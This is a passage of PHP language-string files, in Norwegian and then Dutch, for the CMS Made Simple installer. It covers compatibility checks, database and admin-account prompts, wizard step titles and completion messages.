$lang['msg_configsaved'] = 'Eksisterende config-fil lagret til %s';
$lang['msg_upgrade_module'] = 'Oppgraderer mdodul %s';
$lang['msg_upgrademodules'] = 'Oppgraderer moduler';
$lang['msg_yourvalue'] = 'Du har: %s';
$lang['multibyte_support'] = 'Sjekker for multibyte støtte';
$lang['next'] = 'Neste';
$lang['no'] = 'Nei';
$lang['none'] = 'Ingen';
$lang['open_basedir'] = 'open_basedir restriksjoner';
$lang['open_basedir_session_save_path'] = 'open_basedir er aktivert. Kan derfor ikke teste session save path.';
$lang['output_buffering'] = 'Forsikrer oss om at output buffering er slått på';
$lang['pass_config_writable'] = 'HTTP-prosessen har skriverettighet til config-filen';
$lang['pass_database_support'] = 'Minst en kompatibel database driver er funnet';
$lang['pass_func_json'] = 'json funksjonalitet oppdaget';
$lang['pass_func_md5'] = 'md5 funksjonalitet er oppdaget';
$lang['pass_func_tempnam'] = 'tempnam funksjonen sksisterer';
$lang['pass_intl_support'] = 'Internasjonaliseringsevner ser ut til å være aktivert';
$lang['pass_memory_limit_nolimit'] = 'Det er ingen forhåndsinnstilte PHP minnegrense';
$lang['pass_multibyte_support'] = 'Multibyte støtte ser ut til å være slått på';
$lang['pass_php_version'] = 'PHP versjonen som er konfigurert oppfyller ikke minimumskravene. Som et minimum er PHP %s nødvendig, men vi anbefaler %s eller høyere';
$lang['pass_pwd_writable'] = 'HTTP-prosessen kan skrive i destinasjons katalogen. Dette er nødvendig for ekstrahere filer';
$lang['password'] = 'Passord';
$lang['ph_sitename'] = 'Oppgi ett nettstedsnavn';
$lang['php_version'] = 'PHP versjon';
$lang['post_max_size'] = 'Sjekker den maksimale mengden av data som kan bli sendt i en forespørsel';
$lang['prompt_addlanguages'] = 'Andre språk';
$lang['prompt_createtables'] = 'Oppretter databasetabeller';
$lang['prompt_dbhost'] = 'Database vertsnavn';
$lang['prompt_dbinfo'] = 'Database informasjon';
$lang['prompt_dbname'] = 'Databasenavn';
$lang['prompt_dbpass'] = 'Passord';
$lang['prompt_dbport'] = 'Database portnummer';
$lang['prompt_dbprefix'] = 'Database tabellnavn prefiks';
$lang['prompt_dbtype'] = 'Databasetype';
$lang['prompt_dbuser'] = 'Brukernavn';
$lang['prompt_dir'] = 'Installasjonskatalog';
$lang['prompt_installcontent'] = 'Installer eksempelinnhold';
$lang['prompt_queryvar'] = 'Spørringsvariabel';
$lang['prompt_sitename'] = 'Nettstedsnavn';
$lang['prompt_timezone'] = 'Server tidssone';
$lang['pwd_writable'] = 'Katalog skrivbar';
$lang['queue_for_upgrade'] = 'Lagt i kø ikke kjerne modul %s for oppgradering på neste trinn.';
$lang['readme_uc'] = 'LESMEG';
$lang['register_globals'] = 'Forsikrer oss om at "register globals" er deaktivert';
$lang['remote_url'] = 'Urgående HTTP koblinger';
$lang['repeatpw'] = 'Gjenta passord';
$lang['reset_site_preferences'] = 'Tilbakestill noen nettstedspreferanser';
$lang['reset_user_settings'] = 'Tilbakestill bruker preferanser';
$lang['retry'] = 'Forsøk igjen';
$lang['safe_mode'] = 'Test for å sikre "safe mode" er deaktivert';
$lang['saltpasswords'] = 'Salt passord';
$lang['select_language'] = 'Det første vi vil be deg om å gjøre er å velge språk fra listen nedenfor. Dette vil bli brukt til å forbedre din opplevelse under installasjonen, men vil ikke påvirke din CMSMS installasjon.';
$lang['send_admin_email'] = 'Send admin påloggingsinformasjon e-post';
$lang['session_capabilities'] = 'Teste for riktige sesjons evner (økter bruker cookies og session save path er skrivbar, osv.)';
$lang['session_save_path_exists'] = 'Session_save_path eksisterer';
$lang['session_save_path_writable'] = 'Session_save_path er skrivbar';
$lang['session_use_cookies'] = 'Forsikrer oss om at PHP sesjoner benytter cookies';
$lang['sometests_failed'] = 'Vi har utført en rekke tester av din nåværende web-miljø. Selv om ingen kritiske spørsmål ble funnet, anbefaler vi at følgende elementer rettes opp før du fortsetter.';
$lang['step1_advanced'] = 'Avansert modus';
$lang['step1_destdir'] = 'Velg katalog';
$lang['step1_info_destdir'] = '<strong>Advarsel:</strong> Dette programmet kan installere eller oppgradere flere installasjoner av CMS Made Simple. Det er viktig at du velger riktig katalog for installasjon eller oppgradering.';
$lang['step1_language'] = 'Velg språk';
$lang['step1_title'] = 'Velg språk';
$lang['step2_cmsmsfound'] = 'En installasjon av CMS Made Simple ble funnet. Det er mulig å oppgradere denne installasjonen. Men før du går videre påse at du har en gjeldende, verifisert sikkerhetskopi av alle filer og av databasen';
$lang['step2_cmsmsfoundnoupgrade'] = 'Selv om en installasjon av CMS Made Simple ble funnet, er det ikke mulig å oppgradere denne versjonen ved hjelp av dette programmet. Versjonen kan være for gammel.';
$lang['step2_confirminstall'] = 'Er du sikker på at du vil installere CMS Made Simple';
$lang['step2_confirmupgrade'] = 'Er du sikker på at du vil oppgradere CMS Made Simple';
$lang['step2_errorsamever'] = 'Den valgte katalogen ser ut til å inneholde en CMSMS installasjon med den samme versjonen som er inkludert i dette skriptet. Å fortsette vil oppfriske installasjonen.';
$lang['step2_errortoonew'] = 'Den valgte katalogen ser ut til å inneholde en CMSMS installasjon med en nyere versjon enn som er inkludert i dette skriptet. Vi kan ikke fortsette';
$lang['step2_info_freshen'] = 'Oppfriske installasjonen innebærer utskifting av alle kjernefiler og gjenskape konfigurasjonen. Du vil bli bedt om grunnleggende konfigurasjonsinformasjon, men databasen vil ikke bli berørt.';
$lang['step2_installdate'] = 'Omtrentlig installajsonsdato';
$lang['step2_install_dirnotempty2'] = 'Denne mappen inneholder allerede noen filer og / eller under-mapper . Selv om det er mulig å installere CMSMS her, kan det vertikalantenne korrupte-re et eksisterende program. Vennligst dobbeltsjekke innholdet i denne mappen. For referanseformål noen av filene er listet opp nedenfor. Sørg for at dette er riktig.';
$lang['step2_hdr_upgradeinfo'] = 'Versjonsinformasjon';
$lang['step2_info_upgradeinfo'] = 'Nedenfor er de tilgjengelige versjonsmerknadene, og endrings informasjon for hver utgivelse. Knappene under vil vise detaljert informasjon om hva som har endret seg i hver versjon av CMS Made Simple. Det kan være flere instruksjoner eller advarsler i hver versjon som kan påvirke oppgraderingsprosessen.';
$lang['step2_minupgradever'] = 'Den minste versjonen som dette programmet kan oppgradere fra er: %s. Du må kanskje oppgradere programmet ditt til en nyere versjon i etapper, med en annen metode før du fullfører oppgraderingen. Sørg for at du har en komplett, verifisert backup før du bruker noen oppgraderingsmetoden.';
$lang['step2_nocmsms'] = 'Vi fant ikke en installasjon av CMS Made Simple i denne katalogen. Det ser ut som dette er en ny installasjon';
$lang['step2_nofiles'] = 'Som forespurt, CMSMS kjernefiler vil ikke bli behandlet i denne prosessen';
$lang['step2_passed'] = 'Bestått';
$lang['step2_pwd'] = 'Din nåværende arbeidskatalog';
$lang['step2_schemaver'] = 'Database skjemaversjon';
$lang['step2_version'] = 'Din versjon';
$lang['step3_failed'] = 'Denne pakken har utført en rekke tester av php miljø, og en eller flere av disse testene har mislyktes. Du trenger å rette disse feilene i konfigurasjonen før du fortsetter. Når du har rettet opp feilene, klikk "Prøv på nytt" nedenfor.';
$lang['step3_passed'] = 'Denne pakken har utført en rekke tester av php miljø, og de ​​har alle bestått. Dette er gode nyheter. Selv om dette ikke er en avgjørende test. Du bør ikke ha noen problemer med å kjøre denne Core-installasjonen av CMSMS.';
$lang['step9_get_help'] = 'Koble til andre CMSMS-utviklere og få hjelp på følgende måter';
$lang['step9_get_support'] = 'Støttekanaler';
$lang['step9_join_community'] = 'Bli med i fellesskapet vårt';
$lang['step9_love_cmsms'] = 'Love CMS Made Simple';
$lang['step9_removethis'] = '<strong>Advarsel</strong> Av sikkerhetsmessige grunner er det viktig at du fjerner installasjons assistenten fra ditt nettsted så snart du har bekreftet at operasjonen var vellykket.';
$lang['step9_support_us'] = 'Klikk her for å finne ut hvordan du kan støtte oss';
$lang['symbol'] = 'Symbol';
$lang['social_message'] = 'Du har nå vellykket installert CMS Made Simple';
$lang['test_failed'] = 'En påkrevd Test mislyktes';
$lang['test_passed'] = 'En test er bestått <em>(beståtte tester vises bare i avansert modus) </em>';
$lang['test_warning'] = 'En innstilling er over påkrevd verdi, men under anbefalt verdi, eller ... <br />En evne som kan være nødvendig for noe ekstra funksjonalitet er ikke tilgjengelig';
$lang['th_status'] = 'Status';
$lang['th_testname'] = 'Test';
$lang['th_value'] = 'Verdi';
$lang['title_error'] = 'Houston, Vi har et problem!';
$lang['title_step2'] = 'Steg 2 - Oppdag eksisterende programvare';
$lang['title_step3'] = 'Steg 3 - Tester';
$lang['title_step4'] = 'Steg 4 - Grunnleggende konfigurasjonsinformasjon';
$lang['title_step5'] = 'Steg 5 - Admin kontoinformasjon';
$lang['title_step6'] = 'Steg 6 - Nettstedsinnstillinger';
$lang['title_step7'] = 'Steg 7 - Installerer programfiler';
$lang['title_step8'] = 'Steg 8 - Databasearbeid';
$lang['title_step9'] = 'Steg 9 - Avslutning';
$lang['title_welcome'] = 'Velkommen';
$lang['title_forum'] = 'Supportforum';
$lang['title_docs'] = 'Offisiell Dokumentasjon';
$lang['title_api_docs'] = 'Offisiell API Dokumentasjon';
$lang['to'] = 'til';
$lang['title_share'] = 'Del din erfaring med dine venner';
$lang['tmpfile'] = 'Sjekker for fungerende tmpfile()';
$lang['tmp_dirs_empty'] = 'Forsikre deg om at midletidige kataloger er tomme eller at de ikke eksisterer';
$lang['upgrade'] = 'Oppgrader';
$lang['upgrade_deleteoldevents'] = 'Slett gamle handlinger';
$lang['upgrading_schema'] = 'Oppdaterer databaseskjema';
$lang['upload_max_filesize'] = 'Tester maksimum størrelse på opplastede filer';
$lang['username'] = 'Brukernavn';
$lang['warn_disable_functions'] = 'Merk: en eller flere av PHP kjernefunksjonene er deaktivert. Dette kan ha negativ innvirkning på din CMSMS installasjon, spesielt med tredjeparts utvidelser. Vennligst hold et øye med feilloggen. Dine avslåtte funksjoner er:<br/><br/>%s';
$lang['warn_max_execution_time'] = 'Selv om din maks Execution time på %s overstiger minsteverdien på %s så anbefaler vi deg å øke det til %s eller høyere';
$lang['warn_memory_limit'] = 'Din Minne grenseverdi er %s, som er over minimum %s. Men %s anbefales';
$lang['warn_open_basedir'] = 'open_basedir er aktivert i din PHP konfigurasjon. Selv om du kan fortsette, CMSMS støtter ikke installasjoner med open_basedir restriksjoner.';
$lang['warn_post_max_size'] = 'Ditt post max size verdi er %s, som er over minimummet på %s, men %s er anbefalt. Også, så må du kontrollere at denne verdien er større enn upload_max_filesize';
$lang['warn_tests'] = '<strong>Merk:</strong> å ha bestått alle disse tester bør sørge for at CMSMS fungerer riktig på de fleste områder. Men, som nettstedet vokser og mer funksjonalitet legges til kan disse minimale verdier bli utilstrekkelige. I tillegg kan tredjeparts moduler ha ytterligere krav for å fungere skikkelig';
$lang['warn_upload_max_filesize'] = 'Selv om din innstilling av %s er tilstrekkelig, anbefaler vi at du øker upload_max_filesize innstillingen i PHP til minst %s';
$lang['welcome_message'] = 'Velkommen! Dette er CMS Made Simple\'s automatiske installasjons mekanisme. Denne pakken vil tillate deg å raskt og enkelt bekrefte at webhotellet er kompatibel med CMSMS og å installere eller oppgradere til den nyeste versjonen av CMS Made Simple. <br /> Vi vet at du vil nyte det.';
$lang['wizard_step1'] = 'Velkommen';
$lang['wizard_step2'] = 'Oppdag eksisterende programvare';
$lang['wizard_step3'] = 'Kompatibilitetstester';
$lang['wizard_step4'] = 'Konfigurasjonsinformasjon';
$lang['wizard_step5'] = 'Admin kontoinformasjon';
$lang['wizard_step6'] = 'Nettsted innstillinger';
$lang['wizard_step7'] = 'Filer';
$lang['wizard_step8'] = 'Database arbeid';
$lang['wizard_step9'] = 'Avslutt';
$lang['xml_functions'] = 'Tester for CML funksjonalitet';
$lang['yes'] = 'Ja';
?><?php
$lang['action_freshen'] = 'Repareer / Herstel een bestaande CMSMS %s website';
$lang['action_install'] = 'Installeer een nieuwe CMSMS %s website';
$lang['action_upgrade'] = 'Upgrade een CMSMS website naar versie %s';
$lang['advanced_mode'] = 'Uitgebreide modus toepassen';
$lang['apptitle'] = 'Installatie en Upgrade Assistent';
$lang['assets_dir_exists'] = 'Assets map bestaat';
$lang['available_languages'] = 'Beschikbare talen';
$lang['build_date'] = 'Build Datum';
$lang['changelog_uc'] = 'Changelog';
$lang['cleaning_files'] = 'Bestanden verwijderen die niet langer gebruikt worden';
$lang['config_writable'] = 'Controleer een schrijfbaar config bestand';
$lang['confirm_freshen'] = 'Weet u zeker dat u de bestaande CMSMS installatie wilt opfrissen (repareren)? Gebruik met uiterste voorzichtigheid!';
$lang['confirm_upgrade'] = 'Weet zeker dat u het upgrade proces wilt starten';
$lang['curl_extension'] = 'Controleren naar de CURL extentie';
$lang['create_assets_structure'] = 'Locatie voor bestanden aan het aanmaken';
$lang['database_support'] = 'Controleren op bruikbare database drivers';
$lang['desc_wizard_step1'] = 'Start het installatie of upgrade proces';
$lang['desc_wizard_step2'] = 'Controleer de doelmap op de aanwezigheid van software';
$lang['desc_wizard_step3'] = 'Controleer of alles in orde is om CMSMS te installeren';
$lang['desc_wizard_step4'] = 'Voor een nieuwe website, of herstel, voer enkele basisgegevens in';
$lang['desc_wizard_step5'] = 'Voor een nieuwe website, maak een Admin account aan';
$lang['desc_wizard_step6'] = 'Voor een nieuwe website, voer enkele basisgegevens in';
$lang['desc_wizard_step7'] = 'Bestanden uitpakken';
$lang['desc_wizard_step8'] = 'Aanmaken of bijwerken database-schema, aanmaken initiële events, rechten, gebruikersaccounts, sjablonen, stylesheets en inhoud';
$lang['desc_wizard_step9'] = 'Installeren en/of bijwerken modules indien nodig, configuratiebestand bijwerken, en opruimen';
$lang['destination_directory'] = 'Doel directory';
$lang['dest_writable'] = 'Schrijfrechten in de doelmap';
$lang['disable_functions'] = 'Uitgeschakelde functies';
$lang['done'] = 'gereed';
$lang['email_accountinfo_message'] = 'Uw installatie van CMS Made Simple is geslaagd.

Deze E-mail bevat belangrijke informatie, dat veilig opgeborgen moet worden.

Dit zijn uw website gegevens:
Gebruikersnaam: %s
Wachtwoord: %s
Installatie map: %s
Root URL: %s';
$lang['email_accountinfo_message_exp'] = 'Uw installatie van CMS Made Simple is geslaagd.

Deze E-mail bevat belangrijke informatie, dat veilig opgeborgen moet worden.

Dit zijn uw website gegevens:
Gebruikersnaam: %s
Wachtwoord: %s
Installatie map: %s';
$lang['email_accountinfo_subject'] = 'Installatie CMS Made Simple Gereed';
$lang['emailaccountinfo'] = 'E-mail de account informatie';
$lang['emailaddr'] = 'E-mail adres';
$lang['error_adminacct_emailaddr'] = 'Het e-mail adres is niet correct';
$lang['error_adminacct_emailaddrrequired'] = 'U heeft geen correct e-mail adres ingevoerd om de account informatie naar te versturen';
$lang['error_adminacct_password'] = 'Het ingevoerde wachtwoord is niet correct (moet minimaal 6 karakters lang zijn)';
$lang['error_adminacct_repeatpw'] = 'De ingevoerde wachtwoorden komen niet overeen';
$lang['error_adminacct_username'] = 'De ingevoerde gebruikersnaam is niet correct. Probeer opnieuw';
$lang['error_admindirrenamed'] = 'Het lijkt erop dat u, omwille van beveiliging, de CMSMS \'admin\' directory heeft hernoemd. U moet <a href="http://docs.cmsmadesimple.org/general-information/securing-cmsms#renaming-admin-folder" target="_blank" class="external">dit proces</a> terug draaien om verder te kunnen!';
$lang['error_backupconfig'] = 'Er kan geen back-up gemaakt worden van het config bestand';
$lang['error_checksum'] = 'Checksum van uitgepakte bestand komt niet overeen met het origineel';
$lang['error_cmstablesexist'] = 'Het lijkt erop dat er al een CMSMS installatie in deze database bestaat. Voer a.u.b. andere database gegevens in. Als u gebruik wilt maken van een andere prefix voor de database tabellen kunt u de installatie opnieuw starten en uitgebreide modus toepassen';
$lang['error_createtable'] = 'Probleem bij het aanmaken van database tabel... mogelijk te wijten aan een rechten probleem';
$lang['error_dbconnect'] = 'Er kan geen verbinding worden gemaakt met de database. Controleer de ingevoerde gegevens.';
$lang['error_dirnotvalid'] = 'De directory %s bestaat niet (of is niet schrijfbaar)';
$lang['error_droptable'] = 'Probleem bij het verwijderen van database tabel... mogelijk te wijten aan een rechten probleem';
$lang['error_filenotwritable'] = 'Het bestand %s kan niet worden overschreven (permissie probleem)';
$lang['error_internal'] = 'Er is iets fout gegaan... (interne fout) (%s)';
$lang['error_invalid_directory'] = 'Het lijkt erop dat de gekozen installatie directory in de \'working directory\' van de installer zelf staat';
$lang['error_invalidconfig'] = 'Fout in het config bestand, of het bestand bestaat niet';
$lang['error_invaliddbpassword'] = 'Database wachtwoord bevat ongeldige karakters die niet kunnen worden opgeslagen';
$lang['error_invalidkey'] = 'Ongeldige member variabele van key %s voor class %s';
$lang['error_invalidparam'] = 'Verkeerde (waarde van) parameter: %s';
$lang['error_invalidtimezone'] = 'De gespecificeerde tijdszone is ongeldig';
$lang['error_invalidqueryvar'] = 'De ingevoerde query variabele bevat ongeldige tekens. Alleen alfanumerieke en underscores zijn toegestaan';
$lang['error_missingconfigvar'] = 'De key " %s " is afwezig of ongeldig in het config.ini bestand';
$lang['error_noarchive'] = 'Probleem met het vinden van het archief bestand... graag opnieuw starten';
$lang['error_nlsnotfound'] = 'Probleem met het vinden van de NLS bestanden in het archief bestand';
$lang['error_nodatabases'] = 'Geen bruikbare database extensies gevonden';
$lang['error_nodbhost'] = 'Voer de database hostnaam in';
$lang['error_nodbname'] = 'Voer de database naam in';
$lang['error_nodbpass'] = 'Voer het wachtwoord in van de database server';
$lang['error_nodbprefix'] = 'Voer een prefix in voor de database tabellen';
$lang['error_nodbtype'] = 'Selecteer een database type';
$lang['error_nodbuser'] = 'Voer de gebruikersnaam in van de database';
$lang['error_nodestdir'] = 'Doel directory is niet ingesteld';
$lang['error_nositename'] = 'De websitenaam is een verplicht veld! Vul een naam in voor de website.';
$lang['error_notimezone'] = 'Geef a.u.b. een geldige tijdzone op voor deze server';
$lang['error_overwrite'] = 'Bevoegdheidsprobleem: %s kan niet worden overschreven';
$lang['error_sendingmail'] = 'Fout';
$lang['error_tzlist'] = 'Er is een probleem opgetreden bij het opvragen van de lijst met tijdzones';
$lang['errorlevel_estrict'] = 'E_STRICT controleren';
$lang['errorlevel_edeprecated'] = 'E_DEPRECATED controleren';
$lang['edeprecated_enabled'] = 'E_DEPRECATED is ingeschakeld in PHP error_reporting. Hoewel dit CMSMS niet zal hinderen kan het wel leiden tot meldingen die getoond worden in de browser. Met name bij gebruik van oudere modules van derden';
$lang['estrict_enabled'] = 'E_STRICT is ingeschakeld in PHP error_reporting. Hoewel dit CMSMS niet zal hinderen kan het wel leiden tot meldingen die getoond worden in de browser. Met name bij gebruik van oudere modules van derden';
$lang['fail_assets_dir'] = 'De \'Assets-directory\' bestaat al. Deze applicatie kan bestanden toevoegen of verwijderen in de Assets-directory. Zorg ervoor dat er een backup is gemaakt.';
$lang['fail_assets_msg'] = 'De \'Assets-directory\' bestaat al. Deze applicatie kan bestanden toevoegen of verwijderen in de Assets-directory. Zorg ervoor dat er een backup is gemaakt.';
$lang['fail_config_writable'] = 'De webserver kan het bestand config.php niet aanmaken/wijzigen. Probeer a.u.b. de rechten op dit bestand te wijzigen naar 777 tot de upgrade is voltooid';
$lang['fail_curl_extension'] = 'De curl extensie is niet gevonden. Hoewel dit geen kritisch probleem is kan het problemen veroorzaken bij enkele modules van derden';
$lang['fail_database_support'] = 'Geen bruikbare database drivers gevonden';
$lang['fail_file_get_contents'] = 'De functie file_get_contents bestaat niet of is uitgeschakeld. CMSMS kan niet doorgaan (waarschijnlijk faalt de installatieprocedure zelf)';
$lang['fail_file_uploads'] = 'De mogelijkheid om bestanden te uploaden zijn uitgeschakeld op deze omgeving. Diverse functies van CMSMS zullen niet werken op deze omgeving.';
$lang['fail_func_json'] = 'json functionaliteit niet gevonden';
$lang['fail_func_gzopen'] = 'gzopen functionaliteit is niet gevonden';
$lang['fail_func_md5'] = 'md5 functionaliteit niet gevonden';
$lang['fail_func_tempnam'] = 'De tempnam functionaliteit bestaat niet. Het is een vereiste functie voor het gebruik van CMSMS';
$lang['fail_func_ziparchive'] = 'ZipArchive functionaliteit is niet gevonden, dit kan beperkingen binnen het CMS opleveren...';
$lang['fail_ini_set'] = 'Het lijkt erop dat de ini settings niet aangepast kunnen worden. Dit kan problemen veroorzaken met modules van derden (of wanneer de debug modus wordt ingeschakeld)';
$lang['fail_magic_quotes_runtime'] = 'Het lijkt erop dat magic quotes zijn ingeschakeld in uw configuratie. Schakelt u dat a.u.b. uit en probeer opnieuw';
$lang['fail_max_execution_time'] = 'De max execution time van %s is lager dan de minimale waarde van %s. Het advies is om het te verhogen tot %s of meer';
$lang['fail_memory_limit'] = 'De geheugen limiet waarde is te laag. Uw heeft %s terwijl een minimum van %s vereist is en %s wordt aanbevolen';
$lang['fail_multibyte_support'] = 'Multibyte ondersteuning is niet ingeschakeld in uw configuratie';
$lang['fail_output_buffering'] = 'Output buffering is niet ingeschakeld';
$lang['fail_open_basedir'] = 'Open basedir beperkingen zijn ingeschakeld. CMSMS vereist dat dit is uitgeschakeld';
$lang['fail_php_version'] = 'De PHP versie die beschikbaar is voor CMSMS is erg belangrijk. De minimale versie is %s hoewel we %s of hoger aanbevelen. U heeft %s';
$lang['fail_post_max_size'] = 'Uw post max size van %s is lager dan het minimum van %s. U zou de waarde moeten verhogen naar %s and controleren dat de waarde hoger is dan upload_max_filesize';
$lang['fail_pwd_writable2'] = 'Het HTTP-proces moet in de bestemmings directory en alle ondergelegen directories, schrijfrechten hebben teneinde bestanden te installeren. Op dit moment ontbreekt de schrijfrechten voor tenminste %s';
$lang['fail_register_globals'] = 'Register globals moet uitgeschakeld worden in uw PHP configuratie';
$lang['fail_remote_url'] = 'Er zijn problemen opgetreden bij het benaderen van externe urls. Dit zal de functionaliteit van CMSMS beperken';
$lang['fail_safe_mode'] = 'CMSMS zal niet goed functioneren in een omgeving waar safe mode is ingeschakeld. Ter info: Safe mode is afgekeurd als beveiligingsmechanisme en zal uit toekomstige PHP versies worden verwijderd.';
$lang['fail_session_save_path_exists'] = 'De session save path variabele is ongeldig of de directory bestaat niet';
$lang['fail_session_save_path_writable'] = 'Kan niet schrijven in de \'session save path\' directory';
$lang['fail_session_use_cookies'] = 'Sessions zijn NIET ingesteld om cookies te gebruiken';
$lang['fail_tmpfile'] = 'De systeemfunctie <em>tmpfile()</em> werkt niet. Deze is nodig om de archiefbestanden uit te pakken. De TMPDIR-url parameter kan als parameter worden toegevoegd om een directory aan te geven waar wel naartoe kan worden geschreven. Lees hiervoor ook de README die in directory moet staan.';
$lang['fail_tmp_dirs_empty'] = 'De tijdelijke directories van CMSMS <em>(tmp/cache and tmp/templates_c)</em> bestaan al en zijn niet leeg. Verwijder deze directories of zorg ervoor dat deze leeg worden gemaakt.';
$lang['fail_xml_functions'] = 'De XML extensie is niet gevonden. Schakel deze a.u.b. in voor uw omgeving';
$lang['failed'] = 'mislukt';
$lang['file_get_contents'] = 'Controleren op de file_get_contents functie';
$lang['file_installed'] = 'Geïnstalleerd %s';
$lang['file_uploads'] = 'Controleren op de file upload functionaliteit';
$lang['finished_custom_freshen_msg'] = 'Uw installatie is hersteld. De standaard bestanden zijn bijgewerkt en een nieuw configuratiebestand is aangemaakt. Bezoek a.u.b. uw website om te controleren dat alles juist functioneert';
$lang['finished_custom_install_msg'] = 'Geweldig! We zijn klaar. Bezoek a.u.b. uw website en ga naar het beheerpaneel.';
$lang['finished_custom_upgrade_msg'] = 'Geweldig! Het is klaar. Bezoek a.u.b. uw CMSMS beheerpaneel en website en verzeker uzelf ervan dat alles goed werkt.<br /><b>Tip:</b> nu is een goed moment om een nieuwe backup te maken.';
$lang['finished_freshen_msg'] = 'Uw installatie is hersteld! De core bestanden zijn bijgewerkt en een nieuw configuratie-bestand aangemaakt. U kunt nu <a href="%s">uw website bezoeken</a> of inloggen in <a href="%s">het beheerpaneel</a>.';
$lang['finished_install_msg'] = 'Geweldig! We zijn klaar. U kunt nu <a href="%s">uw website</a> bezoeken of inloggen in <a href="%s">het beheerpaneel</a>.';
$lang['finished_upgrade_msg'] = 'Geweldig, het is gelukt! Bezoek a.u.b. <a href="%s">uw CMSMS beheerpaneel</a> en <a href="%s"> uw website</a> en verzeker uzelf ervan dat alles goed werkt. Mogelijk moet u enkele modules van derden bijwerken.<br /><b>Tip:</b> denk eraan een nieuwe backup te maken na controle dat alles goed werkt.';
$lang['freshen'] = 'Herstellen installatie.';
$lang['func_json'] = 'Controleren op json encoding en decoding functionaliteit';
$lang['func_md5'] = 'Controleren op de md5 functionaliteit';
$lang['func_tempnam'] = 'Controleren naar de tempnam functionaliteit';
$lang['func_gzopen'] = 'Controleren naar de gzopen functionaliteit';
$lang['func_ziparchive'] = 'Controleren naar de ziparchive functionaliteit';
$lang['gd_version'] = 'GD Versie';
$lang['goback'] = 'Terug';
$lang['info_addlanguages'] = 'Selecteer taalbestanden (naast het Engels) om te installeren. Niet alle vertalingen zullen compleet zijn.';
$lang['info_adminaccount'] = 'Gelieve de referenties voor de eerste beheerdersaccount invoeren. Dit account zal toegang hebben tot alle functionaliteiten in het CMSMS beheerpaneel.';
$lang['info_advanced'] = 'Uitgebreide modus biedt meer opties tijdens de installatieprocedure';
$lang['info_dbinfo'] = 'CMS Made Simple slaat een groot gedeelte van de gegevens op in de database. Een database-verbinding is vereist. Verder zou het account dat uw opgeeft ALL PRIVILEGES rechten moeten hebben op de specifieke database om tabellen, indexes en views aan te kunnen maken, verwijderen en wijzigen.';
$lang['info_errorlevel_edeprecated'] = 'E_DEPRECATED is een instelling voor php error reporting die aangeeft dat waarschuwing over code met verouderde technieken moeten worden weergegeven. Hoewel we proberen in CMSMS core geen verouderde technieken te gebruiken kan het voorkomen dat sommige modules dat niet doen. Het advies is om deze instelling uit te schakelen in de PHP configuratie.';
$lang['info_errorlevel_estrict'] = 'E_STRICT is een parameter voor PHP\'s foutmelding dat de \'strict codeing\' standaard moet worden gehanteerd. Ondanks dat het CMSMS Core Team er naar streeft om aan de E_STRICT standaarden te voldoen, is dat niet bij alle modulen ook (al) gelukt. Het advies is daarom om deze parameter uit te schakelen in de PHP configuratie.';
$lang['info_installcontent'] = 'Standaard zal deze installatie een aantal voorbeeld pagina\'s, stylesheets en sjablonen aanmaken in CMSMS. De voorbeeld inhoud bevat uitgebreide informatie over en tips voor het bouwen van websites met CMSMS en is erg nuttig om te lezen. Echter, als u al bekend bent met CMS Made Simple kunt u deze optie uitschakelen en wordt er slechts een minimaal aantal sjablonen, stylesheets en pagina\'s aangemaakt.';
$lang['info_open_basedir_session_save_path'] = 'De parameter open_basedir is actief in de PHP configuratie. De installatie is niet in staat de sessie-mogelijkheden juist te testen. Echter, gezien de status van het installatieproces, mag worden aangenomen dat de sessies goed functioneren.';
$lang['info_pwd_writable'] = 'Deze applicatie heeft schrijfrechten nodig in de huidige working directory';
$lang['info_queryvar'] = 'De query variabele wordt intern gebruikt door CMSMS om de opgevraagde pagina te identificeren. In de meeste gevallen hoeft u dit niet aan te passen';
$lang['info_sitename'] = 'De website-naam wordt gebruikt in de standaard sjablonen als deel van de titel. Voer a.u.b. een naam in de voor de website';
$lang['info_timezone'] = 'De tijdzone-informatie is nodig voor tijdberekeningen en het tonen van datum/tijd. Selecteer a.u.b. de tijdzone van de server';
$lang['ini_set'] = 'Controleren of de INI instellingen aangepast kunnen worden';
$lang['install'] = 'Installeer';
$lang['install_attachstylesheets'] = 'Koppel de stylesheets aan de themes';
$lang['install_backupconfig'] = 'Kopie maken van het config bestand';
$lang['install_createassets'] = 'Opbouwen Assets-directory structuur';
$lang['install_created_index'] = 'Index aangemaakt %s ... %s';
$lang['install_create_tables'] = 'Database tabellen maken';
$lang['install_createconfig'] = 'Nieuw config bestand maken';
$lang['install_createcontentpages'] = 'Standaard pagina inhoud maken';
$lang['install_created_table'] = 'Tabel %s gemaakt: ... %s';
$lang['install_createtablesindexes'] = 'Tabellen en Indexes maken';
$lang['install_createtmpdirs'] = 'Tijdelijke directories maken';
$lang['install_creating_index'] = 'Index %s gemaakt';
$lang['install_default_collections'] = 'Installeer de standaard inhoud';
$lang['install_defaultcontent'] = 'Standaard inhoud installeren';
$lang['install_detectlanguages'] = 'Detecteer geïnstalleerde talen';
$lang['install_dropping_tables'] = 'Tabellen verwijderen';
$lang['install_dummyindexhtml'] = 'Dummy index.html bestanden maken';
$lang['install_extractfiles'] = 'Bestanden uit het archiefbestand uitpakken';
$lang['install_initevents'] = 'Gebeurtenissen aanmaken';
$lang['install_initsitegroups'] = 'Admin gebruikersgroepen instellen';
$lang['install_initsiteperms'] = 'Admin permissies instellen';
$lang['install_initsiteprefs'] = 'Basis website instellingen instellen';
$lang['install_initsiteusers'] = 'Admin account maken';
$lang['install_initsiteusertags'] = 'Standaard UDT\'s maken';
$lang['install_module'] = 'Installeer module %s';
$lang['install_modules'] = 'Installeer beschikbare modules';
$lang['install_passwordsalt'] = 'Salt wachtwoorden instellen';
$lang['install_requireddata'] = 'Benodigde data instellen';
$lang['install_schema'] = 'Database schema maken';
$lang['install_setschemaver'] = 'Schema versie instellen';
$lang['install_setsequence'] = 'Reset sequence tabellen';
$lang['install_setsitename'] = 'Websitenaam instellen';
$lang['install_stylesheets'] = 'Standaard stylesheets maken';
$lang['install_templates'] = 'Standaard sjablonen maken';
$lang['install_templatetypes'] = 'Standaard sjabloontypes maken';
$lang['install_update_sequences'] = 'Sequence tabellen bijwerken';
$lang['install_updatehierarchy'] = 'Pagina hiërarchie posities bijwerken';
$lang['install_updateseq'] = 'Volgorde bijwerken voor %s';
$lang['installer_ver'] = 'Installatie assistent versie';
$lang['legend'] = 'Verklaring';
$lang['magic_quotes_runtime'] = 'Controleer of magic quotes uitgeschakeld zijn';
$lang['max_execution_time'] = 'De PHP max execution time controleren';
$lang['meaning'] = 'Betekenis';
